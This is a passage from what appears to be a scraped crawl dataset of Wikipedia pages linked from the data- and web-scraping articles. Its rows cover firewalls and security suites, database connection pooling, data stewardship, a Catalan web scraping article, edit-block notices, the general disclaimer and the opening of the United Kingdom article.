is permitted by the algorithm. The main advantage of a proxy server is its ability to provide Network Address Translation (NAT), which can hide the user's IP address from the Internet, effectively protecting internal information from the outside. An application-level firewall is a third-generation firewall where a proxy server operates at the very top of the OSI model, the IP suite application level. A network packet is forwarded only if a connection is established using a known protocol. Application-level gateways are notable for analyzing entire messages rather than individual packets. Web browser market share predicts the share of hacker attacks. For example, Internet Explorer 6, which used to lead the market, 19 was heavily attacked. 20 Antivirus software can protect a programmable device by detecting and eliminating malware. 21 A variety of techniques are used, such as signature-based, heuristics, rootkit, and real-time. A password manager is a software application that creates, stores and provides passwords to applications. Password managers encrypt passwords. The user only needs to remember a single master password to access the store. 22 Security suites were first offered for sale in 2003 (McAfee) and contain firewalls, anti-virus, anti-spyware and other components. 23 They also offer theft protection, portable storage device safety check, private Internet browsing, cloud anti-spam, a file shredder or make security-related decisions (answering popup windows) and several were free of charge. 24 A promising technology with low production and installation costs, unattended network operation, and autonomous longtime operation. According to research, building a secure Internet of Things (IoT) should start with securing WSNs ahead of other components. 25 At the National Association of Mutual Savings Banks (NAMSB) conference in January 1976, Atalla Corporation (founded by Mohamed Atalla) and Bunker Ramo Corporation (founded by George Bunker and Simon Ramo) introduced the earliest products designed for dealing with online security. Atalla later added its Identikey hardware security module, and supported processing online transactions and network security. Designed to process bank transactions online, the Identikey system was extended to shared-facility operations. It was compatible with various switching networks, and was capable of resetting itself electronically to any one of 64,000 irreversible nonlinear algorithms as directed by card data information. 26 In 1979, Atalla introduced the first network security processor (NSP). 27 |
100 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Database_connection | A database connection is a facility in computer science that allows client software to talk to database server software, whether on the same machine or not. A connection is required to send commands and receive answers, usually in the form of a result set. Connections are a key concept in data-centric programming. Since some DBMS engines require considerable time to connect, connection pooling was invented to improve performance. No command can be performed against a database without an "open and available" connection to it. Connections are built by supplying an underlying driver or provider with a connection string, which is a way of addressing a specific database or server and instance as well as user authentication credentials (for example, Server sql box;Database Common;User ID uid;Pwd password;). Once a connection has been built it can be opened and closed at will, and properties (such as the command time-out length, or transaction, if one exists) can be set. The Connection String is composed of a set of key value pairs as dictated by the data access interface and data provider being used. Many databases (such as PostgreSQL) only allow one operation to be performed at a time on each connection. If a request for data (a SQL Select statement) is sent to the database and a result set is returned, the connection is open but not available for other operations until the client finishes consuming the result set. Other databases, like SQL Server 2005 (and later), do not impose this limitation. However, databases that provide multiple operations per connection usually incur far more overhead than those that permit only a single operation task at a time. Database connections are finite and expensive and can take a disproportionately long time to create relative to the operations performed on them. It is inefficient for an application to create, use, and close a database connection whenever it needs to update a database. Connection pooling is a technique designed to alleviate this problem. A pool of database connections can be created and then shared among the applications that need to access the database. The connection object obtained from the connection pool is often a wrapper around the actual database connection. The wrapper understands its relationship with the pool, and hides the details of the pool from the application. For example, the wrapper object can implement a "close" method that can be called just like the "close" method on the database connection. Unlike the method on the database connection, the method on the wrapper may not actually close the database connection, but instead return it to the pool. The application need not be aware of the connection pooling when it calls the methods on the wrapper object. This approach encourages the practice of opening a connection in an application only when needed, and closing it as soon as the work is done, rather than holding a connection open for the entire life of the application. In this manner, a relatively small number of connections can service a large number of requests. This is also called multiplexing. In a client server architecture, on the other hand, a persistent connection is typically used so that server state can be managed. This "state" includes server-side cursors, temporary products, connection-specific functional settings, and so on. An application failure occurs when the connection pool overflows. This can occur if all of the connections in the pool are in use when an application requests a connection. For example, the application may use a connection for too long when too many clients attempt to access the web site or one or more operations are blocked or simply inefficient. |
101 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Special:EditPage/Template:Data | You do not have permission to edit this page, for the following reasons: The IP address or range 180.190.0.0 16 has been blocked by Stwalkerster for the following reason(s): Editing from this range has been disabled (blocked) in response to abuse. A range may be shared by many users and innocent users may be affected; if you believe that you are not the person this block is intended for, please follow the instructions below: If you have an account: Please log in to edit. In rare cases, in response to serious abuse, logged-in editing may also be disabled. If you still cannot edit, place unblock on your talk page and make reference to this message. You may wish to ping the blocking administrator or email them via the "email this user" function. If you do not have an account: Registered users are still able to edit. If you cannot create an account from this or another network, you may request that volunteers create your username for you. Please follow the instructions at Wikipedia:Request an account to request an account under your preferred username. It may take some time to process your request. Administrators: Please consult the blocking administrator before altering or lifting this block, and consider consulting with a CheckUser before granting an IP block exemption to an editor using this range. Note that large or hard (logged-in editing blocked) rangeblocks are usually only made in response to serious abuse, and the blocking admin may have information about this block which is essential to reviewing any unblock request. This block will expire on 09:06, 22 May 2032. Your current IP address is 180.190.75.212. Even when blocked, you will usually still be able to edit your user talk page, as well as email administrators and other editors. For information on how to proceed, please read the FAQ for blocked users and the guideline on block appeals. The guide to appealing blocks may also be helpful. Other useful links: Blocking policy Help:I have been blocked This block affects editing on all Wikimedia wikis. The IP address or range 180.190.0.0 16 has been globally blocked by for the following reason(s): Long-term abuse: If you are affected by this block, please message us: request This block will expire on 17:48, 21 December 2024. Your current IP address is 180.190.75.212. Even while globally blocked, you will usually still be able to edit pages on Meta-Wiki. If you believe you were blocked by mistake, you can find additional information and instructions in the No open proxies global policy. Otherwise, to discuss the block please post a request for review on Meta-Wiki. You could also send an email to the stewards VRT queue at stewards wikimedia.org including all above details. Other useful links: Global blocks Help:I have been blocked Pages transcluded onto the current version of this page (help): Return to Template:Data. |
102 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_steward | A data steward is an oversight or data governance role within an organization, and is responsible for ensuring the quality and fitness for purpose of the organization's data assets, including the metadata for those data assets. A data steward may share some responsibilities with a data custodian, such as the awareness, accessibility, release, appropriate use, security and management of data. 1 A data steward would also participate in the development and implementation of data assets. A data steward may seek to improve the quality and fitness for purpose of other data assets their organization depends upon but is not responsible for. Data stewards have a specialist role that utilizes an organization's data governance processes, policies, guidelines and responsibilities for administering an organizations' entire data in compliance with policy and or regulatory obligations. The overall objective of a data steward is the data quality of the data assets, datasets, data records and data elements. 1 2 This includes documenting metainformation for the data, such as definitions, related rules governance, physical manifestation, and related data models (most of these properties being specific to an attribute concept relationship), identifying owners custodian's various responsibilities, relations insight definition needed pertaining to attribute quality, aiding with project requirement data facilitation and documentation of capture rules. Data stewards begin the stewarding process with the identification of the data assets and elements which they will steward, with the ultimate result being standards, controls and data entry. citation needed The steward works closely with business glossary standards analysts (for standards), with data architect modelers (for standards), with DQ analysts (for controls) and with operations team members (good-quality data going in per business rules) while entering data. Data stewardship roles are common when organizations attempt to exchange data precisely and consistently between computer systems and to reuse data-related resources. citation needed Master data management often quantify makes references to the need for data stewardship for its implementation to succeed. Data stewardship must have precise purpose, fit for purpose or fitness. A data steward ensures that each assigned data element: Responsibilities of data stewards vary between different organisations and institutions. For example, at Delft University of Technology, data stewards are perceived as the first contact point for any questions related to research data. They also have subject-specific background allowing them to easily connect with researchers and to contextualise data management problems to take into account disciplinary practices. 3 Depending on the set of data stewardship responsibilities assigned to an individual, there are 4 types (or dimensions of responsibility) of data stewards typically found within an organization: Systematic data stewardship can foster: Assignment of each data element to a person sometimes seems like an unimportant process. But many groups which? have found that users have greater trust and usage rates in systems where they can contact a person with questions on each data element. Delft University of Technology (TU Delft) offers an example of data stewardship implementation at a research institution. In 2017 the Data Stewardship Project was initiated at TU Delft to address research data management needs in a disciplinary manner across the whole campus. 5 Dedicated data stewards with subject-specific background were appointed at every TU Delft faculty to support researchers with data management questions and to act as a linking point with the other institutional support services. The project is coordinated centrally by TU Delft Library, and it has its own website, 6 blog 7 and a YouTube channel. 8 The 1 EPA metadata registry furnishes an example of data stewardship. Note that each data element therein has a "POC" (point of contact). In 2023, ETH Zurich launched the Data Stewardship Network (DSN) to facilitate collaboration among employees engaged in data management, analysis, and code development across research groups. The DSN serves as a platform for networking and knowledge exchange, aiming to professionalize the role of data stewards who support research data management and reproducible workflows. Established by the team for Research Data Management and Digital Curation at the ETH Library, the DSN collaborates with Scientific IT Services to provide expertise in areas such as storage infrastructure and reproducible workflows. 9 A new market for data governance applications is emerging, one in which both technical and business staff — stewards — manage policies. These new applications, like previous generations, deliver a strong business glossary capability, but they do not stop there. Vendors are introducing additional features addressing the roles of business in addition to technical stewards' concerns. 10 Information stewardship applications are business solutions used by business users acting in the role of information steward (interpreting and enforcing information governance policy, for example). These developing solutions represent, for the most part, an amalgam of a number of disparate, previously IT-centric tools already on the market, but are organized and presented in such a way that information stewards (a business role) can support the work of information policy enforcement as part of their normal, business-centric, day-to-day work in a range of use cases. The initial push for the formation of this new category of packaged software came from operational use cases — that is, use of business data in and between transactional and operational business applications. This is where most of the master data management efforts are undertaken in organizations. However, there is also now a faster-growing interest in the new data lake arena for more analytical use cases. 11 Some of the vendors in Metadata Management, like Alation, have started highlighting the importance of Data Stewards to employees interested in using data to make business decisions. 12 |
103 | https://en.wikipedia.org/wiki/Web_scraping | https://zh-yue.wikipedia.org/wiki/%E7%B6%B2%E9%A0%81%E5%88%AE%E6%96%99 | mong5 jip6 gwaat3 liu2 web scraping HTTP 1 2 3 4 5 2 |
104 | https://en.wikipedia.org/wiki/Web_scraping | https://ca.wikipedia.org/wiki/Web_scraping | Web scraping (de l'angl s to scrap 'rasclar') s una t cnica de programari o software inform tic per extreure informaci dels llocs web. En general, aquest tipus de programes de software simulen l'exploraci humana del World Wide Web, ja sigui amb la implementaci de baix nivell de protocol de transfer ncia d'hipertext (HTTP), o amb la incorporaci d'un navegador web, com pot ser Internet Explorer 1 o Mozilla Firefox. 2 El web scraping est molt relacionat amb la indexaci de la web, que indexa informaci de la web utilitzant un robot. Aquesta t cnica s una t cnica universal adoptada per la majoria dels motors de cerca. Per contra, el web scraping se centra m s en la transformaci de les dades no estructurades al web, generalment en format HTML, en dades estructurades que poden ser emmagatzemades i analitzades en una base de dades local, central o de full de c lcul. El web scraping tamb est relacionat amb l'automatitzaci del web, que simula la navegaci humana utilitzant software d'ordinador. Algun dels usos principals del web scraping s n la comparaci de preus en botigues, monitorar dades relacionades amb el clima de certa regi , detectar canvis en llocs webs o la integraci de dades en llocs web. El web scraping s el proc s de recopilar informaci de forma autom tica del web. s un camp amb desenvolupaments actius, que comparteix un prop sit en com amb la visi del web sem ntic. Utilitza solucions pr ctiques basades en tecnologies ja existents. Hi ha diferents nivells d'automatitzaci que les existents tecnologies de web scraping poden oferir: El web scraping pot anar en contra dels termes d' s d'alguns llocs webs. El compliment d'aquests termes no est totalment clar. Mentre que la duplicaci d'expressions originals pot ser en molts casos il legal, als Estats Units la cort va dictar en Feist Publications v. Rural Telephone Service que la duplicaci de fets est permesa. Les corts dels Estats Units en certes ocasions han reconegut que certs usos dels scrapers no haurien d'estar permesos. Podria considerar-se un ordinador com una propietat personal, aleshores l'scraper estaria entrant sense autoritzaci en aquesta propietat. En el cas m s conegut, eBay vs Bidder’s Edge, la segona empresa va haver de parar de fer peticions autom tiques al lloc d'eBay. En aquest cas, Bidder’s Edge licitava autom ticament per certs productes en aquest lloc. Una de les principals lluites al jutjats per scraping va involucrar American Airlines i una empresa anomenada FareChase. American Airlines va guanyar aquella batalla, fent que FareChase par s de vendre un programari que permetia als usuaris comparar tarifes en l nia si el lloc d'American Airlines era incl s. L'aerol nia va dir que les recerques de FareChase entraven sense autoritzaci en els servidors quan recopilaven la informaci p blicament disponible. Southwest Airlines tamb ha estat v ctima de pr ctiques de web scraping, ha involucrat tamb FareChase i una altra empresa anomenada Outtask. Encara que les decisions actualment preses no s n uniformes, s dif cil ignorar que un patr est emergint, en el qual podem veure que les corts estan preparant-se per a protegir el contingut propietari en llocs webs comercials, preveient d'aquesta manera que aquest sigui utilitzat sense el consentiment dels propietaris dels llocs. No obstant aix , el grau de protecci d'aquests continguts encara no est establert. Dependr del tipus d'acc s realitzat pels scrapers, de la quantitat d'informaci recopilada i del grau en qu aquests factors afecten el propietari del lloc web. L'administrador d'un lloc web pot utilitzar diverses t cniques per a aturar o disminuir les comandes dels scrapers. Algunes t cniques inclouen: |
105 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Wikipedia:General_disclaimer | Wikipedia makes no guarantee of validity Wikipedia is an online open-content collaborative encyclopedia; that is, a voluntary association of individuals and groups working to develop a common resource of human knowledge. The structure of the project allows anyone with an Internet connection to alter its content. Please be advised that nothing found here has necessarily been reviewed by people with the expertise required to provide you with complete, accurate, or reliable information. That is not to say that you will not find valuable and accurate information in Wikipedia; much of the time you will. However, Wikipedia cannot guarantee the validity of the information found here. The content of any given article may recently have been changed, vandalized, or altered by someone whose opinion does not correspond with the state of knowledge in the relevant fields. Note that most other encyclopedias and reference works also have disclaimers. Our active community of editors uses tools such as the Special:RecentChanges and Special:NewPages feeds to monitor new and changing content. However, Wikipedia is not uniformly peer reviewed; while readers may correct errors or engage in casual peer review, they have no legal duty to do so and thus all information read here is without any implied warranty of fitness for any purpose or use whatsoever. Even articles that have been vetted by informal peer review or featured article processes may later have been edited inappropriately, just before you view them. None of the contributors, sponsors, administrators, or anyone else connected with Wikipedia in any way whatsoever can be responsible for the appearance of any inaccurate or libelous information or for your use of the information contained in or linked from these web pages. Please make sure that you understand that the information provided here is being provided freely, and that no kind of agreement or contract is created between you and the owners or users of this site, the owners of the servers upon which it is housed, the individual Wikipedia contributors, any project administrators, sysops, or anyone else who is in any way connected with this project or sister projects subject to your claims against them directly. You are being granted a limited license to copy anything from this site; it does not create or imply any contractual or extracontractual liability on the part of Wikipedia or any of its agents, members, organizers, or other users. There is no agreement or understanding between you and Wikipedia regarding your use or modification of this information beyond the Creative Commons Attribution-Sharealike 4.0 Unported License (CC BY-SA) and the GNU Free Documentation License (GFDL); neither is anyone at Wikipedia responsible should someone change, edit, modify, or remove any information that you may post on Wikipedia or any of its associated projects. Any of the trademarks, service marks, collective marks, design rights, or similar rights that are mentioned, used, or cited in the articles of the Wikipedia encyclopedia are the property of their respective owners. Their use here does not imply that you may use them for any purpose other than for the same or a similar informational use as contemplated by the original authors of these Wikipedia articles under the CC BY-SA and GFDL licensing schemes. Unless otherwise stated, Wikipedia and Wikimedia sites are neither endorsed by, nor affiliated with, any of the holders of any such rights, and as such, Wikipedia cannot grant any rights to use any otherwise protected materials. Your use of any such or similar incorporeal property is at your own risk. Wikipedia contains material which may portray an identifiable person who is alive or recently-deceased. The use of images of living or recently-deceased individuals is, in some jurisdictions, restricted by laws pertaining to personality rights, independent from their copyright status. Before using these types of content, please ensure that you have the right to use it under the laws which apply in the circumstances of your intended use. You are solely responsible for ensuring that you do not infringe someone else's personality rights. Publication of information found in Wikipedia may be in violation of the laws of the country or jurisdiction from where you are viewing this information. The Wikipedia database is stored on servers in the United States of America, and is maintained in reference to the protections afforded under local and federal law. Laws in your country or jurisdiction may not protect or allow the same kinds of speech or distribution. Wikipedia does not encourage the violation of any laws, and cannot be responsible for any violations of such laws, should you link to this domain, or use, reproduce, or republish the information contained herein. If you need specific advice (for example, medical, legal, financial, or risk management), please seek a professional who is licensed or knowledgeable in that area. |
106 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit§ion=6 | You do not have permission to edit this page, for the following reasons: The IP address or range 180.190.0.0 16 has been blocked by Stwalkerster for the following reason(s): Editing from this range has been disabled (blocked) in response to abuse. A range may be shared by many users and innocent users may be affected; if you believe that you are not the person this block is intended for, please follow the instructions below: If you have an account: Please log in to edit. In rare cases, in response to serious abuse, logged-in editing may also be disabled. If you still cannot edit, place unblock on your talk page and make reference to this message. You may wish to ping the blocking administrator or email them via the "email this user" function. If you do not have an account: Registered users are still able to edit. If you cannot create an account from this or another network, you may request that volunteers create your username for you. Please follow the instructions at Wikipedia:Request an account to request an account under your preferred username. It may take some time to process your request. Administrators: Please consult the blocking administrator before altering or lifting this block, and consider consulting with a CheckUser before granting an IP block exemption to an editor using this range. Note that large or hard (logged-in editing blocked) rangeblocks are usually only made in response to serious abuse, and the blocking admin may have information about this block which is essential to reviewing any unblock request. This block will expire on 09:06, 22 May 2032. Your current IP address is 180.190.75.212. Even when blocked, you will usually still be able to edit your user talk page, as well as email administrators and other editors. For information on how to proceed, please read the FAQ for blocked users and the guideline on block appeals. The guide to appealing blocks may also be helpful. Other useful links: Blocking policy Help:I have been blocked This block affects editing on all Wikimedia wikis. The IP address or range 180.190.0.0 16 has been globally blocked by for the following reason(s): Long-term abuse: If you are affected by this block, please message us: request This block will expire on 17:48, 21 December 2024. Your current IP address is 180.190.75.212. Even while globally blocked, you will usually still be able to edit pages on Meta-Wiki. If you believe you were blocked by mistake, you can find additional information and instructions in the No open proxies global policy. Otherwise, to discuss the block please post a request for review on Meta-Wiki. You could also send an email to the stewards VRT queue at stewards wikimedia.org including all above details. Other useful links: Global blocks Help:I have been blocked Return to Web scraping. |
107 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/United_Kingdom | The United Kingdom of Great Britain and Northern Ireland, commonly known as the United Kingdom (UK) or Britain, m is a country in Northwestern Europe, off the coast of the continental mainland. 21 22 It comprises England, Scotland, Wales, and Northern Ireland. n 23 The UK includes the island of Great Britain, the north-eastern part of the island of Ireland, and most of the smaller islands within the British Isles. 24 Northern Ireland shares a land border with the Republic of Ireland; otherwise, the United Kingdom is surrounded by the Atlantic Ocean, the North Sea, the English Channel, the Celtic Sea, and the Irish Sea. The total area of the United Kingdom is 94,354 square miles (244,376 km2), e 12 with an estimated population of 67,596,281 people in 2022. 13 In 1707, the Kingdom of England (which included Wales) and the Kingdom of Scotland united under the Treaty of Union to create the Kingdom of Great Britain. The Acts of Union 1800 incorporated the Kingdom of Ireland to create the United Kingdom of Great Britain and Ireland in 1801. Most of Ireland seceded from the UK in 1922 as the Irish Free State, and the Royal and Parliamentary Titles Act 1927 created the present name. The UK became the first industrialised country and was the world's foremost power for the majority of the 19th and early 20th centuries, particularly during the "Pax Britannica" between 1815 and 1914. 25 26 At its height in the 1920s, the British Empire encompassed almost a quarter of the world's landmass and population, and was the largest empire in history. However, its involvement in the First World War and the Second World War damaged Britain's economic power and a global wave of decolonisation led to the independence of most British colonies. 27 28 29 British influence can be observed in the legal and political systems of many of its former colonies, and British culture remains globally influential, particularly in language, literature, music and sport. English is the world's most widely spoken language and the third-most spoken native language. 30 The United Kingdom is a constitutional monarchy and parliamentary democracy. o 32 The UK has three distinct jurisdictions: England and Wales, Scotland, and Northern Ireland. 33 Since 1999, Scotland, Wales and Northern Ireland have their own governments and parliaments which control various devolved matters. 34 The capital and largest city of both England and the United Kingdom is London, whose wider metropolitan area is the largest in Western Europe, with a population of 14.9 million. 35 The cities of Edinburgh, Cardiff, and Belfast are the national capitals of Scotland, Wales, and Northern Ireland, respectively. Other major cities include Birmingham, Manchester, Glasgow, Bristol, Liverpool, Sheffield, Newcastle and Leeds. The UK is a developed country and has the world's sixth-largest economy by nominal gross domestic product (GDP). It is a recognised nuclear state, and is ranked fourth globally in military expenditure. 36 37 The UK has been a permanent member of the UN Security Council since its first session in 1946. It is a member of the Commonwealth of Nations, Council of Europe, G7, OECD, NATO, Five Eyes, AUKUS and CPTPP. The Acts of Union 1707 declared that the Kingdom of England and Kingdom of Scotland were "United into One Kingdom by the Name of Great Britain". p 38 The term "United Kingdom" has occasionally been used as a description for the former Kingdom of Great Britain, although its official name from 1707 to 1800 was simply "Great Britain". 39 The Acts of Union 1800 united the kingdoms of Great Britain and Ireland in 1801, forming the United Kingdom of Great Britain and Ireland. Following the partition of Ireland and the independence of the Irish Free State in 1922, which left Northern Ireland as the only part of the island of Ireland within the United Kingdom, the name was changed in 1927 to the "United Kingdom of Great Britain and Northern Ireland". 40 Although the United Kingdom is a sovereign country, England, Scotland, Wales and Northern Ireland are also widely referred to as countries. 41 The UK Prime Minister's website has used the phrase "countries within a country" to describe the United Kingdom. 42 Some statistical summaries, such as those for the twelve NUTS 1 regions, refer to Scotland, Wales and Northern Ireland as "regions". 43 Northern Ireland is also referred to as a "province". 44 With regard to Northern Ireland, the descriptive name used "can be controversial, with the choice often revealing one's political preferences". 45 The term "Great Britain" conventionally refers to the island of Great Britain, or politically to England, Scotland and Wales in combination. 46 It is sometimes used as a loose synonym for the United Kingdom as a whole. 47 The word England is occasionally used incorrectly to refer to the United Kingdom as a whole, a mistake principally made by people from outside the UK. 48 The term "Britain" is used as a synonym for Great Britain, 49 50 but also sometimes for the United Kingdom. 51 50 Usage is mixed: the UK Government prefers to use the term "UK" rather than "Britain" or "British" on its website (except when referring to embassies), 52 while acknowledging that both terms refer to the United Kingdom and that elsewhere "British government" is used at least as frequently as "United Kingdom government". 53 The UK Permanent Committee on Geographical Names recognises "United Kingdom", "UK" and "U.K. as shortened and abbreviated geopolitical terms for the United Kingdom of Great Britain and Northern Ireland in its toponymic guidelines; it does not list "Britain" but notes that "it is only the one specific nominal term 'Great Britain' which invariably excludes Northern Ireland". 53 The BBC historically preferred to use "Britain" as shorthand only for Great Britain, though the present style guide does not take a position except that "Great Britain" excludes Northern Ireland. 54 The adjective "British" is commonly used to refer to matters relating to the United Kingdom and is used in law to refer to United Kingdom citizenship and matters to do with nationality. 55 q People of the United Kingdom use several different terms to describe their national identity and may identify themselves as being British, English, Scottish, Welsh, Northern Irish, or Irish; 58 or as having a combination of different national identities. 59 The official designation for a citizen of the United Kingdom is "British citizen". 53 Settlement by Cro-Magnons of what was to become the United Kingdom occurred in waves beginning by about 30,000 years ago. 60 The island has been continuously inhabited only since the last retreat of the ice around 11,500 years ago. By the end of the region's prehistoric period, the population is thought to have belonged largely to a culture termed Insular Celtic, comprising Brittonic Britain and Gaelic Ireland. 61 The Roman conquest, beginning in 43 AD, and the 400 year rule of southern Britain, was followed by an invasion by Germanic Anglo-Saxon settlers, reducing the Brittonic area mainly to what was to become Wales, Cornwall and, until the latter stages of the Anglo-Saxon settlement, the Hen Ogledd (northern England and parts of southern Scotland). 62 Most of the region settled by the Anglo-Saxons became unified as the Kingdom of England in the 10th century. 63 Meanwhile, Gaelic-speakers in north-west Britain (with connections to the north-east of Ireland and traditionally supposed to have migrated from there in the 5th century) 64 united with the Picts to create the Kingdom of Scotland in the 9th century. 65 In 1066, the Normans invaded England from northern France. After conquering England, they seized large parts of Wales, conquered much of Ireland and were invited to settle in Scotland, bringing to each country feudalism on the Northern French model and Norman-French culture. 66 The Anglo-Norman ruling class greatly influenced, but eventually assimilated with, the local cultures. 67 Subsequent medieval English kings completed the conquest of Wales and tried unsuccessfully to annex Scotland. Asserting its independence in the 1320 Declaration of Arbroath, Scotland maintained its independence thereafter, albeit in near-constant conflict with England. In 1215 the Magna Carta was the first document to state that no government was above the law, that citizens have rights protecting them and that they were entitled to a fair trial. 68 The English monarchs, through inheritance of substantial territories in France and claims to the French crown, were also heavily involved in conflicts in France, most notably the Hundred Years' War, while the Kings of Scots were in an alliance with the French during this period. 69 Early modern Britain saw religious conflict resulting from the Reformation and the introduction of Protestant state churches in each country. 70 The English Reformation ushered in political, constitutional, social and cultural change in the 16th century and established the Church of England. Moreover, it defined a national identity for England and slowly, but profoundly, changed people's religious beliefs. 71 Wales was fully incorporated into the Kingdom of England, 72 and Ireland was constituted as a kingdom in personal union with the English crown. 73 In what was to become Northern Ireland, the lands of the independent Catholic Gaelic nobility were confiscated and given to Protestant settlers from England and Scotland. 74 England became a colonial and seafaring maritime power, with rich development of art, trade, commerce, industry, architecture, and science. 75 Elizabethan England represented the apogee of the English Renaissance and saw the flowering of great poetry, music and literature. 76 With the founding of the East India Company, other English joint-stock companies and institutions, England competed with Europe, and built a trading empire. 77 78 79 In 1603, the kingdoms of England, Scotland and Ireland were united in a personal union when James VI, King of Scots, inherited the crowns of England and Ireland and moved his court from Edinburgh to London; each country nevertheless remained a separate political entity and retained its separate political, legal, and religious institutions. 80 In the mid 17th century, all three kingdoms were involved in a series of connected wars (including the English Civil War) which led to the temporary overthrow of the monarchy, with the execution of King Charles I, and the establishment of the short-lived unitary republic of the Commonwealth of England, Scotland and Ireland. 81 Although the monarchy was restored, the Interregnum along with the Glorious Revolution of 1688 and the subsequent Bill of Rights 1689 in England and Claim of Right Act 1689 in Scotland ensured that, unlike much of the rest of Europe, royal absolutism would not prevail, and a professed Catholic could never accede to the throne. The British constitution would develop on the basis of constitutional monarchy and the parliamentary system. 82 With the founding of the Royal Society in 1660, science was greatly encouraged. The founding of the Royal Society laid the foundations of modern experimental science. 83 During this period, particularly in England, the development of naval power and the interest in voyages of discovery led to the acquisition and settlement of overseas colonies, particularly in North America and the Caribbean. 84 Though previous attempts at uniting the two kingdoms within Great Britain in 1606, 1667, and 1689 had proved unsuccessful, the attempt initiated in 1705 led to the Treaty of Union of 1706 being agreed and ratified by both parliaments. On 1 May 1707, the Kingdom of Great Britain was formed, the result of the Acts of Union 1707. 85 In the 18th century, cabinet government developed under Robert Walpole, in practice the first prime minister (1721 1742). A series of Jacobite uprisings sought to remove the Protestant House of Hanover from the throne and restore the Catholic House of Stuart. The Jacobites were finally defeated at the Battle of Culloden in 1746, after which the Scottish Highlanders were forcibly assimilated into Scotland by revoking the feudal independence of clan chiefs. The British colonies in North America that broke away in the American War of Independence became the United States, recognised by Britain in 1783. British imperial ambition turned towards Asia, particularly to India. 86 British merchants played a leading part in the Atlantic slave trade, mainly between 1662 and 1807 when British or British-colonial slave ships transported nearly 3.3 million slaves from Africa. 87 The slaves were taken to work on plantations, principally in the Caribbean but also North America. 88 However, with pressure from the abolitionism movement, Parliament banned the trade in 1807, banned slavery in the British Empire in 1833, and Britain took a leading role in the movement to abolish slavery worldwide through the blockade of Africa and pressing other nations to end their trade with a series of treaties. 89 In 1800 the parliaments of Great Britain and Ireland each passed an Act of Union, uniting the two kingdoms and creating the United Kingdom of Great Britain and Ireland on 1 January 1801. 90 After the defeat of France at the end of the French Revolutionary Wars and Napoleonic Wars (1792 1815), the United Kingdom emerged as the principal naval and imperial power (with London the largest city in the world from about 1830). 91 Unchallenged at sea, British dominance was later described as Pax Britannica ("British Peace"), a period of relative peace among the great powers (1815 1914) during which the British Empire became the global hegemon and adopted the role of global policeman. 92 93 By the time of the Great Exhibition of 1851, Britain was described as the "workshop of the world". 94 From 1853 to 1856, Britain took part in the Crimean War, allied with the Ottoman Empire against Tsarist Russia, 95 participating in the naval battles of the Baltic Sea known as the land War in the Gulf of Bothnia and the Gulf of Finland, among others. 96 Following the Indian Rebellion in 1857, the British government led by Lord Palmerston assumed direct rule over India. Alongside the formal control it exerted over its own colonies, British dominance of much of world trade meant that it effectively controlled the economies of regions such as East Asia and Latin America. 97 Throughout the Victorian era, political attitudes favoured free trade and laissez-faire policies. Beginning with the Great Reform Act in 1832, Parliament gradually widened the voting franchise, with the 1884 Reform Act championed by William Gladstone granting suffrage to a majority of males for the first time. The British population increased at a dramatic rate, accompanied by rapid urbanisation, causing significant social and economic stresses. 98 By the late 19th century, the Conservatives under Benjamin Disraeli and Lord Salisbury initiated a period of imperial expansion in Africa, maintained a policy of splendid isolation in Europe, and attempted to contain Russian influence in Afghanistan and Persia, in what came to be known as the Great Game. 99 During this time, Canada, Australia and New Zealand were granted self-governing dominion status. 100 At the turn of the century, Britain's industrial dominance became challenged by the German Empire and the United States. 101 The Edwardian era saw social reform and home rule for Ireland become important domestic issues, while the Labour Party emerged from an alliance of trade unions and small socialist groups in 1900, and suffragettes campaigned for women's right to vote. 102 Britain was one of the principal Allies that defeated the Central Powers in the First World War (1914 1918). Alongside their French, Russian and (after 1917) American counterparts, 103 British armed forces were engaged across much of the British Empire and in several regions of Europe, particularly on the Western Front. 104 The high fatalities of trench warfare caused the loss of much of a generation of men, with lasting social effects in the nation and a great disruption in the social order. Britain had suffered 2.5 million casualties and finished the war with a huge national debt. 104 The consequences of the war persuaded the government to expand the right to vote in national and local elections to all adult men and most adult women with the Representation of the People Act 1918. 104 After the war, Britain became a permanent member of the Executive Council of the League of Nations and received a mandate over a number of former German and Ottoman colonies. Under the leadership of David Lloyd George, the British Empire reached its greatest extent, covering a fifth of the world's land surface and a quarter of its population. 105 By the mid 1920s, most of the British population could listen to BBC radio programmes. 106 107 Experimental television broadcasts began in 1929 and the first scheduled BBC Television Service commenced in 1936. 108 The rise of Irish nationalism, and disputes within Ireland over the terms of Irish Home Rule, led eventually to the partition of the island in 1921. 109 A period of conflict in what is now Northern Ireland occurred from June 1920 until June 1922 (see The Troubles in Ulster (1920 1922)). The Irish Free State became independent, initially with Dominion status in 1922, and unambiguously independent in 1931. Northern Ireland remained part of the United Kingdom. 110 The 1928 Equal Franchise Act gave women electoral equality with men in national elections. Strikes in the mid 1920s culminated in the General Strike of 1926, which ended in a victory for the government led by Stanley Baldwin. Britain had still not recovered from the effects of the First World War when the Great Depression (1929 1932) led to considerable unemployment and hardship in the old industrial areas, as well as political and social unrest with rising membership in communist and socialist parties. A coalition government was formed in 1931. 111 Nonetheless, "Britain was a very wealthy country, formidable in arms, ruthless in pursuit of its interests and sitting at the heart of a global production system. 112 After Nazi Germany invaded Poland in 1939, Britain entered the Second World War. Winston Churchill became prime minister and head of a coalition government in 1940. Despite the defeat of its European allies in the first year, Britain and its Empire continued the war against Germany. Churchill engaged industry, scientists and engineers to support the government and the military in the prosecution of the war effort. 112 In 1940, the Royal Air Force defeated the German Luftwaffe in the Battle of Britain. Urban areas suffered heavy bombing during the Blitz. The Grand Alliance of Britain, the United States and the Soviet Union formed in 1941, leading the Allies against the Axis powers. There were eventual hard-fought victories in the Battle of the Atlantic, the North Africa campaign and the Italian campaign. British forces played important roles in the Normandy landings of 1944 and the liberation of Europe. The British Army led the Burma campaign against Japan, and the British Pacific Fleet fought Japan at sea. British scientists contributed to the Manhattan Project whose task was to build an atomic weapon. 113 Once built, it was decided, with British consent, to use the weapon against Japan. 114 The wartime net losses in British national wealth amounted to 18.6% ( 4.595 billion) of the prewar wealth ( 24.68 billion), at 1938 prices. 115 The UK was one of the 